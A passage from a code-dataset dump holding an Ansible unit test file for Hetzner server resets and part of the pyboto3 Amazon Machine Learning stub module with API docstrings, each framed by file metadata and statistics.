| 11.25 | 24 | 0.733333 | 6 | 45 | 5.166667 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 45 | 3 | 25 | 15 | 0.861111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 1 | 0 | 1.5 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
ccc05c99396e47dc54fe422a88db93b73a35faf9 | 8,445 | py | Python | venv/lib/python3.6/site-packages/ansible_collections/community/hrobot/tests/unit/plugins/modules/test_reset.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | 1 | 2020-01-22T13:11:23.000Z | 2020-01-22T13:11:23.000Z | venv/lib/python3.6/site-packages/ansible_collections/community/hrobot/tests/unit/plugins/modules/test_reset.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | 12 | 2020-02-21T07:24:52.000Z | 2020-04-14T09:54:32.000Z | venv/lib/python3.6/site-packages/ansible_collections/community/hrobot/tests/unit/plugins/modules/test_reset.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | null | null | null | # (c) 2019 Felix Fontein <felix@fontein.de>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible_collections.community.internal_test_tools.tests.unit.utils.fetch_url_module_framework import (
FetchUrlCall,
BaseTestModule,
)
from ansible_collections.community.hrobot.plugins.module_utils.robot import BASE_URL
from ansible_collections.community.hrobot.plugins.modules import reset
class TestHetznerReset(BaseTestModule):
MOCK_ANSIBLE_MODULEUTILS_BASIC_ANSIBLEMODULE = 'ansible_collections.community.hrobot.plugins.modules.reset.AnsibleModule'
MOCK_ANSIBLE_MODULEUTILS_URLS_FETCH_URL = 'ansible_collections.community.hrobot.plugins.module_utils.robot.fetch_url'
def test_check_valid(self, mocker):
result = self.run_module_success(mocker, reset, {
'hetzner_user': '',
'hetzner_password': '',
'server_number': 23,
'reset_type': 'software',
'_ansible_check_mode': True,
}, [
FetchUrlCall('GET', 200)
.result_json({
'reset': {
'server_ip': '123.123.123.123',
'server_ipv6_net': '2a01:4f8:111:4221::',
'server_number': 23,
'type': [
'sw',
'hw',
'man'
],
'operating_status': 'not supported',
},
})
.expect_url('{0}/reset/23'.format(BASE_URL)),
])
assert result['changed'] is True
def test_valid(self, mocker):
result = self.run_module_success(mocker, reset, {
'hetzner_user': '',
'hetzner_password': '',
'server_number': 23,
'reset_type': 'manual',
}, [
FetchUrlCall('POST', 200)
.expect_form_value('type', 'man')
.result_json({
'reset': {
'server_ip': '123.123.123.123',
'server_ipv6_net': '2a01:4f8:111:4221::',
'server_number': 23,
'type': 'man',
},
})
.expect_url('{0}/reset/23'.format(BASE_URL)),
])
assert result['changed'] is True
# Errors
def test_invalid(self, mocker):
result = self.run_module_failed(mocker, reset, {
'hetzner_user': '',
'hetzner_password': '',
'server_number': 23,
'reset_type': 'power',
}, [
FetchUrlCall('POST', 400)
.expect_form_value('type', 'power')
.result_json({
'error': {
'status': 400,
'code': 'INVALID_INPUT',
'message': 'Invalid input parameters',
},
})
.expect_url('{0}/reset/23'.format(BASE_URL)),
])
assert result['msg'] == 'The chosen reset method is not supported for this server'
def test_check_invalid(self, mocker):
result = self.run_module_failed(mocker, reset, {
'hetzner_user': '',
'hetzner_password': '',
'server_number': 23,
'reset_type': 'power',
'_ansible_check_mode': True,
}, [
FetchUrlCall('GET', 200)
.result_json({
'reset': {
'server_ip': '123.123.123.123',
'server_ipv6_net': '2a01:4f8:111:4221::',
'server_number': 23,
'type': [
'sw',
'hw',
'man'
],
'operating_status': 'not supported',
},
})
.expect_url('{0}/reset/23'.format(BASE_URL)),
])
assert result['msg'] == 'The chosen reset method is not supported for this server'
def test_server_not_found(self, mocker):
result = self.run_module_failed(mocker, reset, {
'hetzner_user': '',
'hetzner_password': '',
'server_number': 23,
'reset_type': 'power',
}, [
FetchUrlCall('POST', 404)
.expect_form_value('type', 'power')
.result_json({
'error': {
'status': 404,
'code': 'SERVER_NOT_FOUND',
'message': 'Server not found',
},
})
.expect_url('{0}/reset/23'.format(BASE_URL)),
])
assert result['msg'] == 'This server does not exist, or you do not have access rights for it'
def test_check_server_not_found(self, mocker):
result = self.run_module_failed(mocker, reset, {
'hetzner_user': '',
'hetzner_password': '',
'server_number': 23,
'reset_type': 'power',
'_ansible_check_mode': True,
}, [
FetchUrlCall('GET', 404)
.result_json({
'error': {
'status': 404,
'code': 'SERVER_NOT_FOUND',
'message': 'Server not found',
},
})
.expect_url('{0}/reset/23'.format(BASE_URL)),
])
assert result['msg'] == 'This server does not exist, or you do not have access rights for it'
def test_reset_not_available(self, mocker):
result = self.run_module_failed(mocker, reset, {
'hetzner_user': '',
'hetzner_password': '',
'server_number': 23,
'reset_type': 'power',
}, [
FetchUrlCall('POST', 404)
.expect_form_value('type', 'power')
.result_json({
'error': {
'status': 404,
'code': 'RESET_NOT_AVAILABLE',
'message': 'The server has no reset option',
},
})
.expect_url('{0}/reset/23'.format(BASE_URL)),
])
assert result['msg'] == 'The server has no reset option available'
def test_check_reset_not_available(self, mocker):
result = self.run_module_failed(mocker, reset, {
'hetzner_user': '',
'hetzner_password': '',
'server_number': 23,
'reset_type': 'power',
'_ansible_check_mode': True,
}, [
FetchUrlCall('GET', 404)
.result_json({
'error': {
'status': 404,
'code': 'RESET_NOT_AVAILABLE',
'message': 'The server has no reset option',
},
})
.expect_url('{0}/reset/23'.format(BASE_URL)),
])
assert result['msg'] == 'The server has no reset option available'
def test_reset_manual_active(self, mocker):
result = self.run_module_failed(mocker, reset, {
'hetzner_user': '',
'hetzner_password': '',
'server_number': 23,
'reset_type': 'power',
}, [
FetchUrlCall('POST', 409)
.expect_form_value('type', 'power')
.result_json({
'error': {
'status': 409,
'code': 'RESET_MANUAL_ACTIVE',
'message': 'There is already a running manual reset',
},
})
.expect_url('{0}/reset/23'.format(BASE_URL)),
])
assert result['msg'] == 'A manual reset is already running'
def test_reset_failed(self, mocker):
result = self.run_module_failed(mocker, reset, {
'hetzner_user': '',
'hetzner_password': '',
'server_number': 23,
'reset_type': 'power',
}, [
FetchUrlCall('POST', 500)
.expect_form_value('type', 'power')
.result_json({
'error': {
'status': 500,
'code': 'RESET_FAILED',
'message': 'Resetting failed due to an internal error',
},
})
.expect_url('{0}/reset/23'.format(BASE_URL)),
])
assert result['msg'] == 'The reset failed due to an internal error at Hetzner'
| 35.93617 | 125 | 0.486679 | 787 | 8,445 | 4.970775 | 0.182973 | 0.039877 | 0.046524 | 0.051125 | 0.801636 | 0.801636 | 0.76227 | 0.76227 | 0.73364 | 0.699131 | 0 | 0.036496 | 0.383541 | 8,445 | 234 | 126 | 36.089744 | 0.714944 | 0.016459 | 0 | 0.766355 | 0 | 0 | 0.267526 | 0.017466 | 0 | 0 | 0 | 0 | 0.046729 | 1 | 0.046729 | false | 0.046729 | 0.018692 | 0 | 0.079439 | 0.004673 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ccc0aa302cba7bdcd52588946ea116a0ba2c4fdc | 88,216 | py | Python | pyboto3/machinelearning.py | thecraftman/pyboto3 | 653a0db2b00b06708334431da8f169d1f7c7734f | [
"MIT"
] | null | null | null | pyboto3/machinelearning.py | thecraftman/pyboto3 | 653a0db2b00b06708334431da8f169d1f7c7734f | [
"MIT"
] | null | null | null | pyboto3/machinelearning.py | thecraftman/pyboto3 | 653a0db2b00b06708334431da8f169d1f7c7734f | [
"MIT"
] | null | null | null | '''
The MIT License (MIT)
Copyright (c) 2016 WavyCloud
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
def add_tags(Tags=None, ResourceId=None, ResourceType=None):
"""
Adds one or more tags to an object, up to a limit of 10. Each tag consists of a key and an optional value. If you add a tag using a key that is already associated with the ML object, AddTags updates the tag's value.
See also: AWS API Documentation
:example: response = client.add_tags(
Tags=[
{
'Key': 'string',
'Value': 'string'
},
],
ResourceId='string',
ResourceType='BatchPrediction'|'DataSource'|'Evaluation'|'MLModel'
)
:type Tags: list
:param Tags: [REQUIRED]
The key-value pairs to use to create tags. If you specify a key without specifying a value, Amazon ML creates a tag with the specified key and a value of null.
(dict) --A custom key-value pair associated with an ML object, such as an ML model.
Key (string) --A unique identifier for the tag. Valid characters include Unicode letters, digits, white space, _, ., /, =, +, -, %, and @.
Value (string) --An optional string, typically used to describe or define the tag. Valid characters include Unicode letters, digits, white space, _, ., /, =, +, -, %, and @.
:type ResourceId: string
:param ResourceId: [REQUIRED]
The ID of the ML object to tag. For example, exampleModelId .
:type ResourceType: string
:param ResourceType: [REQUIRED]
The type of the ML object to tag.
:rtype: dict
:return: {
'ResourceId': 'string',
'ResourceType': 'BatchPrediction'|'DataSource'|'Evaluation'|'MLModel'
}
"""
pass
def can_paginate(operation_name=None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is create_foo, and you'd normally invoke the
operation as client.create_foo(**kwargs), if the
create_foo operation can be paginated, you can use the
call client.get_paginator('create_foo').
"""
pass
def create_batch_prediction(BatchPredictionId=None, BatchPredictionName=None, MLModelId=None, BatchPredictionDataSourceId=None, OutputUri=None):
"""
Generates predictions for a group of observations. The observations to process exist in one or more data files referenced by a DataSource . This operation creates a new BatchPrediction , and uses an MLModel and the data files referenced by the DataSource as information sources.
CreateBatchPrediction is an asynchronous operation. In response to CreateBatchPrediction , Amazon Machine Learning (Amazon ML) immediately returns and sets the BatchPrediction status to PENDING . After the BatchPrediction completes, Amazon ML sets the status to COMPLETED .
You can poll for status updates by using the GetBatchPrediction operation and checking the Status parameter of the result. After the COMPLETED status appears, the results are available in the location specified by the OutputUri parameter.
See also: AWS API Documentation
:example: response = client.create_batch_prediction(
BatchPredictionId='string',
BatchPredictionName='string',
MLModelId='string',
BatchPredictionDataSourceId='string',
OutputUri='string'
)
:type BatchPredictionId: string
:param BatchPredictionId: [REQUIRED]
A user-supplied ID that uniquely identifies the BatchPrediction .
:type BatchPredictionName: string
:param BatchPredictionName: A user-supplied name or description of the BatchPrediction . BatchPredictionName can only use the UTF-8 character set.
:type MLModelId: string
:param MLModelId: [REQUIRED]
The ID of the MLModel that will generate predictions for the group of observations.
:type BatchPredictionDataSourceId: string
:param BatchPredictionDataSourceId: [REQUIRED]
The ID of the DataSource that points to the group of observations to predict.
:type OutputUri: string
:param OutputUri: [REQUIRED]
The location of an Amazon Simple Storage Service (Amazon S3) bucket or directory to store the batch prediction results. The following substrings are not allowed in the s3 key portion of the outputURI field: ':', '//', '/./', '/../'.
Amazon ML needs permissions to store and retrieve the logs on your behalf. For information about how to set permissions, see the Amazon Machine Learning Developer Guide .
:rtype: dict
:return: {
'BatchPredictionId': 'string'
}
"""
pass
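The docstring above describes a polling pattern: call `GetBatchPrediction` and check `Status` until a terminal value appears. A minimal sketch of that loop — the helper names are mine, the status strings (`PENDING`, `COMPLETED`, `FAILED`) come from the documentation above, and `get_status` would in practice be a closure around `client.get_batch_prediction(...)`:

```python
import time

TERMINAL_STATUSES = {"COMPLETED", "FAILED"}  # terminal states named in the docs

def is_terminal(status):
    """True once the BatchPrediction has finished, successfully or not."""
    return status in TERMINAL_STATUSES

def wait_for_batch_prediction(get_status, poll_seconds=30, max_polls=120):
    """Poll `get_status` until a terminal status appears; return it.

    `get_status` is any zero-argument callable returning the current
    Status string, e.g. a wrapper around client.get_batch_prediction.
    """
    for _ in range(max_polls):
        status = get_status()
        if is_terminal(status):
            return status
        time.sleep(poll_seconds)
    raise TimeoutError("BatchPrediction did not reach a terminal status")
```

Once `COMPLETED` is returned, the results are available at the `OutputUri` given when the batch prediction was created.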
def create_data_source_from_rds(DataSourceId=None, DataSourceName=None, RDSData=None, RoleARN=None, ComputeStatistics=None):
"""
Creates a DataSource object from an Amazon Relational Database Service (Amazon RDS). A DataSource references data that can be used to perform CreateMLModel , CreateEvaluation , or CreateBatchPrediction operations.
CreateDataSourceFromRDS is an asynchronous operation. In response to CreateDataSourceFromRDS , Amazon Machine Learning (Amazon ML) immediately returns and sets the DataSource status to PENDING . After the DataSource is created and ready for use, Amazon ML sets the Status parameter to COMPLETED . DataSource in the COMPLETED or PENDING state can be used only to perform CreateMLModel , CreateEvaluation , or CreateBatchPrediction operations.
If Amazon ML cannot accept the input source, it sets the Status parameter to FAILED and includes an error message in the Message attribute of the GetDataSource operation response.
See also: AWS API Documentation
:example: response = client.create_data_source_from_rds(
DataSourceId='string',
DataSourceName='string',
RDSData={
'DatabaseInformation': {
'InstanceIdentifier': 'string',
'DatabaseName': 'string'
},
'SelectSqlQuery': 'string',
'DatabaseCredentials': {
'Username': 'string',
'Password': 'string'
},
'S3StagingLocation': 'string',
'DataRearrangement': 'string',
'DataSchema': 'string',
'DataSchemaUri': 'string',
'ResourceRole': 'string',
'ServiceRole': 'string',
'SubnetId': 'string',
'SecurityGroupIds': [
'string',
]
},
RoleARN='string',
ComputeStatistics=True|False
)
:type DataSourceId: string
:param DataSourceId: [REQUIRED]
A user-supplied ID that uniquely identifies the DataSource . Typically, an Amazon Resource Number (ARN) becomes the ID for a DataSource .
:type DataSourceName: string
:param DataSourceName: A user-supplied name or description of the DataSource .
:type RDSData: dict
:param RDSData: [REQUIRED]
The data specification of an Amazon RDS DataSource :
DatabaseInformation -
DatabaseName - The name of the Amazon RDS database.
InstanceIdentifier - A unique identifier for the Amazon RDS database instance.
DatabaseCredentials - AWS Identity and Access Management (IAM) credentials that are used to connect to the Amazon RDS database.
ResourceRole - A role (DataPipelineDefaultResourceRole) assumed by an EC2 instance to carry out the copy task from Amazon RDS to Amazon Simple Storage Service (Amazon S3). For more information, see Role templates for data pipelines.
ServiceRole - A role (DataPipelineDefaultRole) assumed by the AWS Data Pipeline service to monitor the progress of the copy task from Amazon RDS to Amazon S3. For more information, see Role templates for data pipelines.
SecurityInfo - The security information to use to access an RDS DB instance. You need to set up appropriate ingress rules for the security entity IDs provided to allow access to the Amazon RDS instance. Specify a [SubnetId , SecurityGroupIds ] pair for a VPC-based RDS DB instance.
SelectSqlQuery - A query that is used to retrieve the observation data for the Datasource .
S3StagingLocation - The Amazon S3 location for staging Amazon RDS data. The data retrieved from Amazon RDS using SelectSqlQuery is stored in this location.
DataSchemaUri - The Amazon S3 location of the DataSchema .
DataSchema - A JSON string representing the schema. This is not required if DataSchemaUri is specified.
DataRearrangement - A JSON string that represents the splitting and rearrangement requirements for the Datasource . Sample - '{\'splitting\':{\'percentBegin\':10,\'percentEnd\':60}}'
DatabaseInformation (dict) -- [REQUIRED]Describes the DatabaseName and InstanceIdentifier of an Amazon RDS database.
InstanceIdentifier (string) -- [REQUIRED]The ID of an RDS DB instance.
DatabaseName (string) -- [REQUIRED]The name of a database hosted on an RDS DB instance.
SelectSqlQuery (string) -- [REQUIRED]The query that is used to retrieve the observation data for the DataSource .
DatabaseCredentials (dict) -- [REQUIRED]The AWS Identity and Access Management (IAM) credentials that are used to connect to the Amazon RDS database.
Username (string) -- [REQUIRED]The username to be used by Amazon ML to connect to database on an Amazon RDS instance. The username should have sufficient permissions to execute an RDSSelectSqlQuery query.
Password (string) -- [REQUIRED]The password to be used by Amazon ML to connect to a database on an RDS DB instance. The password should have sufficient permissions to execute the RDSSelectSqlQuery query.
S3StagingLocation (string) -- [REQUIRED]The Amazon S3 location for staging Amazon RDS data. The data retrieved from Amazon RDS using SelectSqlQuery is stored in this location.
DataRearrangement (string) --A JSON string that represents the splitting and rearrangement processing to be applied to a DataSource . If the DataRearrangement parameter is not provided, all of the input data is used to create the Datasource .
There are multiple parameters that control what data is used to create a datasource:
``percentBegin`` Use percentBegin to indicate the beginning of the range of the data used to create the Datasource. If you do not include percentBegin and percentEnd , Amazon ML includes all of the data when creating the datasource.
``percentEnd`` Use percentEnd to indicate the end of the range of the data used to create the Datasource. If you do not include percentBegin and percentEnd , Amazon ML includes all of the data when creating the datasource.
``complement`` The complement parameter instructs Amazon ML to use the data that is not included in the range of percentBegin to percentEnd to create a datasource. The complement parameter is useful if you need to create complementary datasources for training and evaluation. To create a complementary datasource, use the same values for percentBegin and percentEnd , along with the complement parameter. For example, the following two datasources do not share any data, and can be used to train and evaluate a model. The first datasource has 25 percent of the data, and the second one has 75 percent of the data. Datasource for evaluation: {'splitting':{'percentBegin':0, 'percentEnd':25}} Datasource for training: {'splitting':{'percentBegin':0, 'percentEnd':25, 'complement':'true'}}
``strategy`` To change how Amazon ML splits the data for a datasource, use the strategy parameter. The default value for the strategy parameter is sequential , meaning that Amazon ML takes all of the data records between the percentBegin and percentEnd parameters for the datasource, in the order that the records appear in the input data. The following two DataRearrangement lines are examples of sequentially ordered training and evaluation datasources: Datasource for evaluation: {'splitting':{'percentBegin':70, 'percentEnd':100, 'strategy':'sequential'}} Datasource for training: {'splitting':{'percentBegin':70, 'percentEnd':100, 'strategy':'sequential', 'complement':'true'}} To randomly split the input data into the proportions indicated by the percentBegin and percentEnd parameters, set the strategy parameter to random and provide a string that is used as the seed value for the random data splitting (for example, you can use the S3 path to your data as the random seed string). If you choose the random split strategy, Amazon ML assigns each row of data a pseudo-random number between 0 and 100, and then selects the rows that have an assigned number between percentBegin and percentEnd . Pseudo-random numbers are assigned using both the input seed string value and the byte offset as a seed, so changing the data results in a different split. Any existing ordering is preserved. The random splitting strategy ensures that variables in the training and evaluation data are distributed similarly. It is useful in the cases where the input data may have an implicit sort order, which would otherwise result in training and evaluation datasources containing non-similar data records. 
The following two DataRearrangement lines are examples of non-sequentially ordered training and evaluation datasources: Datasource for evaluation: {'splitting':{'percentBegin':70, 'percentEnd':100, 'strategy':'random', 'randomSeed':'s3://my_s3_path/bucket/file.csv'}} Datasource for training: {'splitting':{'percentBegin':70, 'percentEnd':100, 'strategy':'random', 'randomSeed':'s3://my_s3_path/bucket/file.csv', 'complement':'true'}}
DataSchema (string) --A JSON string that represents the schema for an Amazon RDS DataSource . The DataSchema defines the structure of the observation data in the data file(s) referenced in the DataSource .
A DataSchema is not required if you specify a DataSchemaUri .
Define your DataSchema as a series of key-value pairs. attributes and excludedVariableNames have an array of key-value pairs for their value. Use the following format to define your DataSchema .
{ 'version': '1.0',
'recordAnnotationFieldName': 'F1',
'recordWeightFieldName': 'F2',
'targetFieldName': 'F3',
'dataFormat': 'CSV',
'dataFileContainsHeader': true,
'attributes': [
{ 'fieldName': 'F1', 'fieldType': 'TEXT' }, { 'fieldName': 'F2', 'fieldType': 'NUMERIC' }, { 'fieldName': 'F3', 'fieldType': 'CATEGORICAL' }, { 'fieldName': 'F4', 'fieldType': 'NUMERIC' }, { 'fieldName': 'F5', 'fieldType': 'CATEGORICAL' }, { 'fieldName': 'F6', 'fieldType': 'TEXT' }, { 'fieldName': 'F7', 'fieldType': 'WEIGHTED_INT_SEQUENCE' }, { 'fieldName': 'F8', 'fieldType': 'WEIGHTED_STRING_SEQUENCE' } ],
'excludedVariableNames': [ 'F6' ] }
DataSchemaUri (string) --The Amazon S3 location of the DataSchema .
ResourceRole (string) -- [REQUIRED]The role (DataPipelineDefaultResourceRole) assumed by an Amazon Elastic Compute Cloud (Amazon EC2) instance to carry out the copy task from Amazon RDS to Amazon S3. For more information, see Role templates for data pipelines.
ServiceRole (string) -- [REQUIRED]The role (DataPipelineDefaultRole) assumed by AWS Data Pipeline service to monitor the progress of the copy task from Amazon RDS to Amazon S3. For more information, see Role templates for data pipelines.
SubnetId (string) -- [REQUIRED]The subnet ID to be used to access a VPC-based RDS DB instance. This attribute is used by Data Pipeline to carry out the copy task from Amazon RDS to Amazon S3.
SecurityGroupIds (list) -- [REQUIRED]The security group IDs to be used to access a VPC-based RDS DB instance. Ensure that there are appropriate ingress rules set up to allow access to the RDS DB instance. This attribute is used by Data Pipeline to carry out the copy task from Amazon RDS to Amazon S3.
(string) --
:type RoleARN: string
:param RoleARN: [REQUIRED]
The role that Amazon ML assumes on behalf of the user to create and activate a data pipeline in the user's account and copy data using the SelectSqlQuery query from Amazon RDS to Amazon S3.
:type ComputeStatistics: boolean
:param ComputeStatistics: The compute statistics for a DataSource . The statistics are generated from the observation data referenced by a DataSource . Amazon ML uses the statistics internally during MLModel training. This parameter must be set to true if the DataSource needs to be used for MLModel training.
:rtype: dict
:return: {
'DataSourceId': 'string'
}
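The complement and strategy parameters described above can be generated rather than hand-written. The helper below is a hypothetical convenience (not part of boto3) that builds a matched pair of training/evaluation DataRearrangement strings suitable for the DataRearrangement field of the RDS DataSpec:

```python
import json

def split_pair(percent_begin, percent_end, random_seed=None):
    # Build complementary DataRearrangement JSON strings. The datasource
    # WITHOUT 'complement' receives the rows inside the range; the one
    # WITH 'complement':'true' receives the remaining rows.
    splitting = {"percentBegin": percent_begin, "percentEnd": percent_end}
    if random_seed is not None:
        splitting["strategy"] = "random"
        splitting["randomSeed"] = random_seed
    evaluation = json.dumps({"splitting": dict(splitting)})
    training = json.dumps({"splitting": dict(splitting, complement="true")})
    return training, evaluation

# Example: evaluation gets the first 25 percent of rows, training the other 75.
train_str, eval_str = split_pair(0, 25)
```

Passing the same range plus a seed yields a random, reproducible split instead of a sequential one.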
"""
pass
def create_data_source_from_redshift(DataSourceId=None, DataSourceName=None, DataSpec=None, RoleARN=None, ComputeStatistics=None):
"""
Creates a DataSource from a database hosted on an Amazon Redshift cluster. A DataSource references data that can be used to perform either CreateMLModel , CreateEvaluation , or CreateBatchPrediction operations.
CreateDataSourceFromRedshift is an asynchronous operation. In response to CreateDataSourceFromRedshift , Amazon Machine Learning (Amazon ML) immediately returns and sets the DataSource status to PENDING . After the DataSource is created and ready for use, Amazon ML sets the Status parameter to COMPLETED . DataSource in COMPLETED or PENDING states can be used to perform only CreateMLModel , CreateEvaluation , or CreateBatchPrediction operations.
If Amazon ML can't accept the input source, it sets the Status parameter to FAILED and includes an error message in the Message attribute of the GetDataSource operation response.
The observations should be contained in the database hosted on an Amazon Redshift cluster and should be specified by a SelectSqlQuery query. Amazon ML executes an UNLOAD command in Amazon Redshift to transfer the result set of the SelectSqlQuery query to S3StagingLocation .
After the DataSource has been created, it's ready for use in evaluations and batch predictions. If you plan to use the DataSource to train an MLModel , the DataSource also requires a recipe. A recipe describes how each input variable will be used in training an MLModel . Will the variable be included or excluded from training? Will the variable be manipulated; for example, will it be combined with another variable or will it be split apart into word combinations? The recipe provides answers to these questions.
You can't change an existing datasource, but you can copy and modify the settings from an existing Amazon Redshift datasource to create a new datasource. To do so, call GetDataSource for an existing datasource and copy the values to a CreateDataSource call. Change the settings that you want to change and make sure that all required fields have the appropriate values.
See also: AWS API Documentation
:example: response = client.create_data_source_from_redshift(
DataSourceId='string',
DataSourceName='string',
DataSpec={
'DatabaseInformation': {
'DatabaseName': 'string',
'ClusterIdentifier': 'string'
},
'SelectSqlQuery': 'string',
'DatabaseCredentials': {
'Username': 'string',
'Password': 'string'
},
'S3StagingLocation': 'string',
'DataRearrangement': 'string',
'DataSchema': 'string',
'DataSchemaUri': 'string'
},
RoleARN='string',
ComputeStatistics=True|False
)
:type DataSourceId: string
:param DataSourceId: [REQUIRED]
A user-supplied ID that uniquely identifies the DataSource .
:type DataSourceName: string
:param DataSourceName: A user-supplied name or description of the DataSource .
:type DataSpec: dict
:param DataSpec: [REQUIRED]
The data specification of an Amazon Redshift DataSource :
DatabaseInformation -
DatabaseName - The name of the Amazon Redshift database.
ClusterIdentifier - The unique ID for the Amazon Redshift cluster.
DatabaseCredentials - The AWS Identity and Access Management (IAM) credentials that are used to connect to the Amazon Redshift database.
SelectSqlQuery - The query that is used to retrieve the observation data for the Datasource .
S3StagingLocation - The Amazon Simple Storage Service (Amazon S3) location for staging Amazon Redshift data. The data retrieved from Amazon Redshift using the SelectSqlQuery query is stored in this location.
DataSchemaUri - The Amazon S3 location of the DataSchema .
DataSchema - A JSON string representing the schema. This is not required if DataSchemaUri is specified.
DataRearrangement - A JSON string that represents the splitting and rearrangement requirements for the DataSource . Sample - '{\'splitting\':{\'percentBegin\':10,\'percentEnd\':60}}'
DatabaseInformation (dict) -- [REQUIRED]Describes the DatabaseName and ClusterIdentifier for an Amazon Redshift DataSource .
DatabaseName (string) -- [REQUIRED]The name of a database hosted on an Amazon Redshift cluster.
ClusterIdentifier (string) -- [REQUIRED]The ID of an Amazon Redshift cluster.
SelectSqlQuery (string) -- [REQUIRED]Describes the SQL Query to execute on an Amazon Redshift database for an Amazon Redshift DataSource .
DatabaseCredentials (dict) -- [REQUIRED]Describes the AWS Identity and Access Management (IAM) credentials that are used to connect to the Amazon Redshift database.
Username (string) -- [REQUIRED]A username to be used by Amazon Machine Learning (Amazon ML) to connect to a database on an Amazon Redshift cluster. The username should have sufficient permissions to execute the RedshiftSelectSqlQuery query. The username should be valid for an Amazon Redshift USER .
Password (string) -- [REQUIRED]A password to be used by Amazon ML to connect to a database on an Amazon Redshift cluster. The password should have sufficient permissions to execute a RedshiftSelectSqlQuery query. The password should be valid for an Amazon Redshift USER .
S3StagingLocation (string) -- [REQUIRED]Describes an Amazon S3 location to store the result set of the SelectSqlQuery query.
DataRearrangement (string) --A JSON string that represents the splitting and rearrangement processing to be applied to a DataSource . If the DataRearrangement parameter is not provided, all of the input data is used to create the Datasource .
There are multiple parameters that control what data is used to create a datasource:
``percentBegin`` Use percentBegin to indicate the beginning of the range of the data used to create the Datasource. If you do not include percentBegin and percentEnd , Amazon ML includes all of the data when creating the datasource.
``percentEnd`` Use percentEnd to indicate the end of the range of the data used to create the Datasource. If you do not include percentBegin and percentEnd , Amazon ML includes all of the data when creating the datasource.
``complement`` The complement parameter instructs Amazon ML to use the data that is not included in the range of percentBegin to percentEnd to create a datasource. The complement parameter is useful if you need to create complementary datasources for training and evaluation. To create a complementary datasource, use the same values for percentBegin and percentEnd , along with the complement parameter. For example, the following two datasources do not share any data, and can be used to train and evaluate a model. The first datasource has 25 percent of the data, and the second one has 75 percent of the data. Datasource for evaluation: {'splitting':{'percentBegin':0, 'percentEnd':25}} Datasource for training: {'splitting':{'percentBegin':0, 'percentEnd':25, 'complement':'true'}}
``strategy`` To change how Amazon ML splits the data for a datasource, use the strategy parameter. The default value for the strategy parameter is sequential , meaning that Amazon ML takes all of the data records between the percentBegin and percentEnd parameters for the datasource, in the order that the records appear in the input data. The following two DataRearrangement lines are examples of sequentially ordered training and evaluation datasources: Datasource for evaluation: {'splitting':{'percentBegin':70, 'percentEnd':100, 'strategy':'sequential'}} Datasource for training: {'splitting':{'percentBegin':70, 'percentEnd':100, 'strategy':'sequential', 'complement':'true'}} To randomly split the input data into the proportions indicated by the percentBegin and percentEnd parameters, set the strategy parameter to random and provide a string that is used as the seed value for the random data splitting (for example, you can use the S3 path to your data as the random seed string). If you choose the random split strategy, Amazon ML assigns each row of data a pseudo-random number between 0 and 100, and then selects the rows that have an assigned number between percentBegin and percentEnd . Pseudo-random numbers are assigned using both the input seed string value and the byte offset as a seed, so changing the data results in a different split. Any existing ordering is preserved. The random splitting strategy ensures that variables in the training and evaluation data are distributed similarly. It is useful in the cases where the input data may have an implicit sort order, which would otherwise result in training and evaluation datasources containing non-similar data records. 
The following two DataRearrangement lines are examples of non-sequentially ordered training and evaluation datasources: Datasource for evaluation: {'splitting':{'percentBegin':70, 'percentEnd':100, 'strategy':'random', 'randomSeed':'s3://my_s3_path/bucket/file.csv'}} Datasource for training: {'splitting':{'percentBegin':70, 'percentEnd':100, 'strategy':'random', 'randomSeed':'s3://my_s3_path/bucket/file.csv', 'complement':'true'}}
DataSchema (string) --A JSON string that represents the schema for an Amazon Redshift DataSource . The DataSchema defines the structure of the observation data in the data file(s) referenced in the DataSource .
A DataSchema is not required if you specify a DataSchemaUri .
Define your DataSchema as a series of key-value pairs. attributes and excludedVariableNames have an array of key-value pairs for their value. Use the following format to define your DataSchema .
{ 'version': '1.0',
'recordAnnotationFieldName': 'F1',
'recordWeightFieldName': 'F2',
'targetFieldName': 'F3',
'dataFormat': 'CSV',
'dataFileContainsHeader': true,
'attributes': [
